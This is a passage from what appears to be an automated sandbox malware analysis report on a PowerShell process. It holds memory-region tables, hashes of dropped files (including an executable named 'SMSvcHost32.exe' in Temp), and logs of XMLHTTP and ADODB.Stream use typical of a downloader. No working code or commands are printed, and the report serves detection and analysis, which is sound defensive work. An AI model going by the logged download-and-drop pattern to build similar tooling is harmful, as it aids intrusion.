|
|
- |
| sortdefault.nls | 0x1505f070000 | 0x1505f3a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000001505f3b0000 | 0x1505f3b0000 | 0x1505f4affff | Private Memory | rw |
|
|
|
- |
| private_0x000001505f5a0000 | 0x1505f5a0000 | 0x1505f5affff | Private Memory | rwx |
|
|
|
- |
| private_0x000001505f5b0000 | 0x1505f5b0000 | 0x1505f6affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000001505f6b0000 | 0x1505f6b0000 | 0x1505faaafff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007df5fff90000 | 0x7df5fff90000 | 0x7ff5fff8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7f4470000 | 0x7ff7f4470000 | 0x7ff7f447ffff | Private Memory | rwx |
|
|
|
- |
| private_0x00007ff7f4480000 | 0x7ff7f4480000 | 0x7ff7f451ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00007ff7f4520000 | 0x7ff7f4520000 | 0x7ff7f461ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7f4620000 | 0x7ff7f4620000 | 0x7ff7f4642fff | Pagefile Backed Memory | r |
|
|
|
- |
| powershell.exe | 0x7ff7f50e0000 | 0x7ff7f5157fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffb98ae0000 | 0x7ffb98ae0000 | 0x7ffb98aeffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98af0000 | 0x7ffb98af0000 | 0x7ffb98afffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98b00000 | 0x7ffb98b00000 | 0x7ffb98b8ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98b90000 | 0x7ffb98b90000 | 0x7ffb98bfffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c00000 | 0x7ffb98c00000 | 0x7ffb98c3ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c40000 | 0x7ffb98c40000 | 0x7ffb98c4ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c50000 | 0x7ffb98c50000 | 0x7ffb98c5ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c60000 | 0x7ffb98c60000 | 0x7ffb98c6ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c70000 | 0x7ffb98c70000 | 0x7ffb98c7ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c80000 | 0x7ffb98c80000 | 0x7ffb98c8ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98c90000 | 0x7ffb98c90000 | 0x7ffb98c9ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98ca0000 | 0x7ffb98ca0000 | 0x7ffb98caffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cb0000 | 0x7ffb98cb0000 | 0x7ffb98cbffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cc0000 | 0x7ffb98cc0000 | 0x7ffb98ccffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cd0000 | 0x7ffb98cd0000 | 0x7ffb98cdffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98ce0000 | 0x7ffb98ce0000 | 0x7ffb98ceffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98cf0000 | 0x7ffb98cf0000 | 0x7ffb98cfffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d00000 | 0x7ffb98d00000 | 0x7ffb98d0ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d10000 | 0x7ffb98d10000 | 0x7ffb98d1ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d20000 | 0x7ffb98d20000 | 0x7ffb98d2ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d30000 | 0x7ffb98d30000 | 0x7ffb98d3ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d40000 | 0x7ffb98d40000 | 0x7ffb98d4ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d50000 | 0x7ffb98d50000 | 0x7ffb98d5ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d60000 | 0x7ffb98d60000 | 0x7ffb98d6ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d70000 | 0x7ffb98d70000 | 0x7ffb98d7ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d80000 | 0x7ffb98d80000 | 0x7ffb98d8ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb98d90000 | 0x7ffb98d90000 | 0x7ffb98d9ffff | Private Memory | - |
|
|
|
- |
| system.configuration.ni.dll | 0x7ffbf24a0000 | 0x7ffbf25bffff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7ffbf25e0000 | 0x7ffbf2641fff | Memory Mapped File | rwx |
|
|
|
- |
| clrjit.dll | 0x7ffbf2650000 | 0x7ffbf2754fff | Memory Mapped File | rwx |
|
|
|
- |
| system.diagnostics.tracing.ni.dll | 0x7ffbf2760000 | 0x7ffbf2764fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x7ffbf2770000 | 0x7ffbf27bcfff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7ffbf27c0000 | 0x7ffbf2896fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7ffbf28a0000 | 0x7ffbf28cbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7ffbf28d0000 | 0x7ffbf2a2efff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7ffbf2a30000 | 0x7ffbf2b91fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7ffbf2ba0000 | 0x7ffbf3439fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.management.infrastructure.ni.dll | 0x7ffbf3440000 | 0x7ffbf34dbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.numerics.ni.dll | 0x7ffbf34e0000 | 0x7ffbf352ffff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7ffbf3530000 | 0x7ffbf5538fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7ffbf5590000 | 0x7ffbf563bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7ffbf5640000 | 0x7ffbf5fc0fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7ffbf5fd0000 | 0x7ffbf6be3fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7ffbf6bf0000 | 0x7ffbf80b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120_clr0400.dll | 0x7ffbf8150000 | 0x7ffbf8246fff | Memory Mapped File | rwx |
|
|
|
- |
| clr.dll | 0x7ffbf8250000 | 0x7ffbf8bddfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7ffbf8be0000 | 0x7ffbf8c77fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7ffbf8c80000 | 0x7ffbf8ce7fff | Memory Mapped File | rwx |
|
|
|
- |
| wldp.dll | 0x7ffc02db0000 | 0x7ffc02dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7ffc04bd0000 | 0x7ffc04bedfff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffc07360000 | 0x7ffc0736bfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc07370000 | 0x7ffc07379fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7ffc0a020000 | 0x7ffc0a031fff | Memory Mapped File | rwx |
|
|
|
- |
| davhlpr.dll | 0x7ffc0a050000 | 0x7ffc0a05bfff | Memory Mapped File | rwx |
|
|
|
- |
| davclnt.dll | 0x7ffc0a060000 | 0x7ffc0a07ffff | Memory Mapped File | rwx |
|
|
|
- |
| ntlanman.dll | 0x7ffc0a080000 | 0x7ffc0a095fff | Memory Mapped File | rwx |
|
|
|
- |
| drprov.dll | 0x7ffc0a0a0000 | 0x7ffc0a0aafff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc0a0b0000 | 0x7ffc0a0cafff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x7ffc0ba70000 | 0x7ffc0ba85fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc11060000 | 0x7ffc1106bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc11260000 | 0x7ffc11293fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc115d0000 | 0x7ffc115e6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc116f0000 | 0x7ffc116fafff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc118d0000 | 0x7ffc118fcfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc11a60000 | 0x7ffc11ab5fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc11b80000 | 0x7ffc11ba8fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc11c50000 | 0x7ffc11c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc11c60000 | 0x7ffc11caafff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc11cb0000 | 0x7ffc11cc3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc11cd0000 | 0x7ffc11cdefff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc11f60000 | 0x7ffc125a3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc125b0000 | 0x7ffc12664fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc12670000 | 0x7ffc126d9fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc126e0000 | 0x7ffc12722fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc12840000 | 0x7ffc12a27fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc12c40000 | 0x7ffc1419efff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc141a0000 | 0x7ffc14325fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc145f0000 | 0x7ffc1469cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc14700000 | 0x7ffc1481bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc14820000 | 0x7ffc1485afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc14860000 | 0x7ffc148b1fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc148c0000 | 0x7ffc14b3cfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc14bb0000 | 0x7ffc14cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc14d10000 | 0x7ffc14e65fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc152a0000 | 0x7ffc15360fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x7ffc15400000 | 0x7ffc15407fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc15480000 | 0x7ffc154dafff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc154e0000 | 0x7ffc15586fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc15590000 | 0x7ffc1562cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 115 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b SSDeep: 3:U:U |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp | 245.50 KB |
MD5:
3cf7a348da34fbb5b7a77f49e6219a76
SHA1: ace28cb17ef956527798c4dc77c50e5559c74cdb SHA256: 1eceed1163da873e4988bd7b232c751a3f7699035e458db2abf8c4483a627409 SSDeep: 6144:22C5kIiyCoHmrokIR7CcGIt11H+9cfKa:2Z5zPGrokIR77FhH+T |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | 233.00 KB |
MD5:
b976604a3d1b7ad8fd551e834e9403b5
SHA1: 6ac5ccc2b3bd1cffaab41b35b7b70ca42ba7a3da SHA256: e8c89103d3c1c23f7bad82c61d563d842f796a900ce201953d6339bd2af917eb SSDeep: 6144:wS3Qz86ucBW5wLr9QR9z5b+KNXnE8RAr2WJSfjEi:wSztXw/90zZ+wGq |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18 | 1.16 KB |
MD5:
9832b59b183bb6318e62f1385d345c6d
SHA1: 54b856a180fb3723403f9aad24ca548de63dc376 SHA256: bfd60204585f1603ee9faac7c44adb9fcd6fa56b7748f03ecb1a9beaa7c56ea1 SSDeep: 24:WM83yV+ty+qXlIZXxf/DXdQXPZX3X6S+Z+Wz+q:BSy8PilIhNTWPhn6lgDq |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | 10.76 KB |
MD5:
8845f276e426accd51223008b6aed4bf
SHA1: c9fa81aa57e7c32c4bcefd33788967cc3170fe91 SHA256: 72831bc6962c8017ea71abc038a8f60e79976ebaf05d363c80f32c975a55d0d9 SSDeep: 192:8wUOJGqwAf5CBbXuQuxs0B8HX64MnENxUyrTEAsr9jQ0uwm/CgGZYySo0nbSRNNo:8wUOJGqwARCBbXxss0B8364MnENxUyr3 |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | 1.77 KB |
MD5:
c9fa9488f8854802c6f5eff3234d8a8a
SHA1: 8b9029e83008d74b8c5414a2ef064629a340c9ae SHA256: 12bd362291f72f2c2e7756742b7377549d13d5bf231455d23ef250c5bdf18121 SSDeep: 24:WM83yV+ty+ZcnPZcMGcZcFc7Vc4vcEvcXc6c4ncSZncJ5S+Z+Wz+q:BSy8PiPiMLim64EEEM34cYcJ5lgDq |
|
|
| c:\users\nd9e1fyi\appdata\local\microsoft\windows\inetcache\counters.dat | 0.12 KB |
MD5:
637026929ebd81f12ba900b120be2e6c
SHA1: b22c135f30e37e86172e00683cee428feb7ac073 SHA256: 18116a5c09285f02aaa01e297f37ceee97acdbff8035b34c7ccf1de9a449bc61 SSDeep: 3:kTltB:elt |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
c9c50ae0691385cfaacd3e92f289bf6b
SHA1: bdb5036049e55bc7f386f70a0fc3ee6250ef0d46 SHA256: d9184ecb0e61d52465ed927b1c9cacd90c10a57b2a2c82cded2f2f5b811067fd SSDeep: 384:yEsbXrBaxb7k02/0pdIGs+VW6lIZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:1F03+oYG |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
7f393766e0f6225d98acdb893a5f418c
SHA1: cd052ac4835f207edbbe9e9281e92d87b3b4454b SHA256: aa53cc5fab633b04729595c31a1e5cfb40f52f9af6721db5483e2c4b3513d8a5 SSDeep: 384:yEsbArBaxb7k02/0pdIGs+VW6lIZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:aF03+oYG |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
6882238308f271219ef31923f15890df
SHA1: 814f24ecd5b95562b2a4704f2ff988ff8737d398 SHA256: 1dc600b2e870db4bc42c23305c50a60810691341e4d951887c66a8e2371977ac SSDeep: 384:yEsbArBxxb7k02/0pdIGs+VW6lZZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:5Y03+oYG |
|
|
| C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 19.46 KB |
MD5:
40e29531e81493d6e680e38c3ace3714
SHA1: ee078721826355eae9ef0e96d476edf307d54046 SHA256: 57b17ab692375358c25c34caf15c1f0b4705a67ea5bedbd852fdec393a40eac0 SSDeep: 384:yEsbArBxxb7k02/0pdIGs+VW6lIZFi7xal0Rxfk2/i4JB9tG+sQRwuA01Jn6ioKA:5F03+oYG |
|
|
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | Msxml2.XMLHTTP | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | ADODB.Stream | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | Msxml2.XMLHTTP | IDispatch | method_name = Open |
|
1 |
File (1229)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
